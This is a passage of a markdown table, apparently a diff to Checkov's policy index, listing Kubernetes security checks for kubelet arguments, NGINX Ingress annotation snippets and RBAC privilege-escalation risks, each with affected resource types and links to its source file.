[KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3459 | CKV_K8S_143 | resource | DaemonSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3460 | CKV_K8S_143 | resource | Deployment | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3461 | CKV_K8S_143 | resource | DeploymentConfig | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3462 | CKV_K8S_143 | resource | Job | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3463 | CKV_K8S_143 | resource | Pod | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3464 | CKV_K8S_143 | resource | PodTemplate | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3465 | CKV_K8S_143 | resource | ReplicaSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3466 | CKV_K8S_143 | resource | ReplicationController | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3467 | CKV_K8S_143 | resource | StatefulSet | Ensure that the --streaming-connection-idle-timeout argument is not set to 0 | Kubernetes | [KubeletStreamingConnectionIdleTimeout.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletStreamingConnectionIdleTimeout.py) | +| 3468 | CKV_K8S_144 | resource | CronJob | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3469 | CKV_K8S_144 | resource | DaemonSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3470 | CKV_K8S_144 | resource | Deployment | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3471 | CKV_K8S_144 | resource | DeploymentConfig | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3472 | CKV_K8S_144 | resource | Job | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3473 | CKV_K8S_144 | resource | Pod | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3474 | CKV_K8S_144 | resource | PodTemplate | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3475 | CKV_K8S_144 | resource | ReplicaSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3476 | CKV_K8S_144 | resource | ReplicationController | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3477 | CKV_K8S_144 | resource | StatefulSet | Ensure that the --protect-kernel-defaults argument is set to true | Kubernetes | [KubeletProtectKernelDefaults.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletProtectKernelDefaults.py) | +| 3478 | CKV_K8S_145 | resource | CronJob | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3479 | CKV_K8S_145 | resource | DaemonSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3480 | CKV_K8S_145 | resource | Deployment | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3481 | CKV_K8S_145 | resource | DeploymentConfig | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3482 | CKV_K8S_145 | resource | Job | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3483 | CKV_K8S_145 | resource | Pod | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3484 | CKV_K8S_145 | resource | PodTemplate | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3485 | CKV_K8S_145 | resource | ReplicaSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3486 | CKV_K8S_145 | resource | ReplicationController | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3487 | CKV_K8S_145 | resource | StatefulSet | Ensure that the --make-iptables-util-chains argument is set to true | Kubernetes | [KubeletMakeIptablesUtilChains.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletMakeIptablesUtilChains.py) | +| 3488 | CKV_K8S_146 | resource | CronJob | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3489 | CKV_K8S_146 | resource | DaemonSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3490 | CKV_K8S_146 | resource | Deployment | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3491 | CKV_K8S_146 | resource | DeploymentConfig | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3492 | CKV_K8S_146 | resource | Job | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3493 | CKV_K8S_146 | resource | Pod | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3494 | CKV_K8S_146 | resource | PodTemplate | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3495 | CKV_K8S_146 | resource | ReplicaSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3496 | CKV_K8S_146 | resource | ReplicationController | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3497 | CKV_K8S_146 | resource | StatefulSet | Ensure that the --hostname-override argument is not set | Kubernetes | [KubeletHostnameOverride.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletHostnameOverride.py) | +| 3498 | CKV_K8S_147 | resource | CronJob | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3499 | CKV_K8S_147 | resource | DaemonSet | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3500 | CKV_K8S_147 | resource | Deployment | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3501 | CKV_K8S_147 | resource | DeploymentConfig | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3502 | CKV_K8S_147 | resource | Job | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3503 | CKV_K8S_147 | resource | Pod | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3504 | CKV_K8S_147 | resource | PodTemplate | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3505 | CKV_K8S_147 | resource | ReplicaSet | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3506 | CKV_K8S_147 | resource | ReplicationController | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3507 | CKV_K8S_147 | resource | StatefulSet | Ensure that the --event-qps argument is set to 0 or a level which ensures appropriate event capture | Kubernetes | [KubletEventCapture.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletEventCapture.py) | +| 3508 | CKV_K8S_148 | resource | CronJob | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3509 | CKV_K8S_148 | resource | DaemonSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3510 | CKV_K8S_148 | resource | Deployment | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3511 | CKV_K8S_148 | resource | DeploymentConfig | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3512 | CKV_K8S_148 | resource | Job | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3513 | CKV_K8S_148 | resource | Pod | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3514 | CKV_K8S_148 | resource | PodTemplate | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3515 | CKV_K8S_148 | resource | ReplicaSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3516 | CKV_K8S_148 | resource | ReplicationController | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3517 | CKV_K8S_148 | resource | StatefulSet | Ensure that the --tls-cert-file and --tls-private-key-file arguments are set as appropriate | Kubernetes | [KubeletKeyFilesSetAppropriate.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletKeyFilesSetAppropriate.py) | +| 3518 | CKV_K8S_149 | resource | CronJob | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3519 | CKV_K8S_149 | resource | DaemonSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3520 | CKV_K8S_149 | resource | Deployment | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3521 | CKV_K8S_149 | resource | DeploymentConfig | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3522 | CKV_K8S_149 | resource | Job | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3523 | CKV_K8S_149 | resource | Pod | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3524 | CKV_K8S_149 | resource | PodTemplate | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3525 | CKV_K8S_149 | resource | ReplicaSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3526 | CKV_K8S_149 | resource | ReplicationController | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3527 | CKV_K8S_149 | resource | StatefulSet | Ensure that the --rotate-certificates argument is not set to false | Kubernetes | [KubletRotateCertificates.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubletRotateCertificates.py) | +| 3528 | CKV_K8S_151 | resource | CronJob | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | +| 3529 | CKV_K8S_151 | resource | DaemonSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | +| 3530 | CKV_K8S_151 | resource | Deployment | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | +| 3531 | CKV_K8S_151 | resource | DeploymentConfig | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | +| 3532 | CKV_K8S_151 | resource | Job | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | +| 3533 | CKV_K8S_151 | resource | Pod | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | +| 3534 | CKV_K8S_151 | resource | PodTemplate | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | +| 3535 | CKV_K8S_151 | resource | ReplicaSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | +| 3536 | CKV_K8S_151 | resource | ReplicationController | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | +| 3537 | CKV_K8S_151 | resource | StatefulSet | Ensure that the Kubelet only makes use of Strong Cryptographic Ciphers | Kubernetes | [KubeletCryptographicCiphers.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/KubeletCryptographicCiphers.py) | +| 3538 | CKV_K8S_152 | resource | Ingress | Prevent NGINX Ingress annotation snippets which contain LUA code execution. See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742Lua.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Lua.py) | +| 3539 | CKV_K8S_153 | resource | Ingress | Prevent All NGINX Ingress annotation snippets. See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742AllSnippets.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742AllSnippets.py) | +| 3540 | CKV_K8S_154 | resource | Ingress | Prevent NGINX Ingress annotation snippets which contain alias statements See CVE-2021-25742 | Kubernetes | [NginxIngressCVE202125742Alias.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/NginxIngressCVE202125742Alias.py) | +| 3541 | CKV_K8S_155 | resource | ClusterRole | Minimize ClusterRoles that grant control over validating or mutating admission webhook configurations | Kubernetes | [RbacControlWebhooks.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacControlWebhooks.py) | +| 3542 | CKV_K8S_156 | resource | ClusterRole | Minimize ClusterRoles that grant permissions to approve CertificateSigningRequests | Kubernetes | [RbacApproveCertificateSigningRequests.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacApproveCertificateSigningRequests.py) | +| 3543 | CKV_K8S_157 | resource | ClusterRole | Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings | Kubernetes | [RbacBindRoleBindings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py) | +| 3544 | CKV_K8S_157 | resource | Role | Minimize Roles and ClusterRoles that grant permissions to bind RoleBindings or ClusterRoleBindings | Kubernetes | [RbacBindRoleBindings.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacBindRoleBindings.py) | +| 3545 | CKV_K8S_158 | resource | ClusterRole | Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRoles | Kubernetes | [RbacEscalateRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py) | +| 3546 | CKV_K8S_158 | resource | Role | Minimize Roles and ClusterRoles that grant permissions to escalate Roles or ClusterRoles | Kubernetes | [RbacEscalateRoles.py](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/resource/k8s/RbacEscalateRoles.py) | +| 3547 | CKV2_K8S_1 | resource | ClusterRole | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) | +| 3548 | CKV2_K8S_1 | resource | ClusterRoleBinding | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) | +| 3549 | CKV2_K8S_1 | resource | Role | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) | +| 3550 | CKV2_K8S_1 | resource | RoleBinding | RoleBinding should not allow privilege escalation to a ServiceAccount or Node on other RoleBinding | Kubernetes | [RoleBindingPE.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/RoleBindingPE.yaml) | +| 3551 | CKV2_K8S_2 | resource | ClusterRole | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) | +| 3552 | CKV2_K8S_2 | resource | ClusterRoleBinding | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) | +| 3553 | CKV2_K8S_2 | resource | Role | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) | +| 3554 | CKV2_K8S_2 | resource | RoleBinding | Granting `create` permissions to `nodes/proxy` or `pods/exec` sub resources allows potential privilege escalation | Kubernetes | [NoCreateNodesProxyOrPodsExec.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/NoCreateNodesProxyOrPodsExec.yaml) | +| 3555 | CKV2_K8S_3 | resource | ClusterRole | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) | +| 3556 | CKV2_K8S_3 | resource | ClusterRoleBinding | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) | +| 3557 | CKV2_K8S_3 | resource | Role | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) | +| 3558 | CKV2_K8S_3 | resource | RoleBinding | No ServiceAccount/Node should have `impersonate` permissions for groups/users/service-accounts | Kubernetes | [ImpersonatePermissions.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ImpersonatePermissions.yaml) | +| 3559 | CKV2_K8S_4 | resource | ClusterRole | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) | +| 3560 | CKV2_K8S_4 | resource | ClusterRoleBinding | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) | +| 3561 | CKV2_K8S_4 | resource | Role | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) | +| 3562 | CKV2_K8S_4 | resource | RoleBinding | ServiceAccounts and nodes that can modify services/status may set the `status.loadBalancer.ingress.ip` field to exploit the unfixed CVE-2020-8554 and launch MiTM attacks against the cluster. | Kubernetes | [ModifyServicesStatus.yaml](https://github.com/bridgecrewio/checkov/blob/main/checkov/kubernetes/checks/graph_checks/ModifyServicesStatus.yaml) | +| 3563 | CKV2_K8S_5 | resource 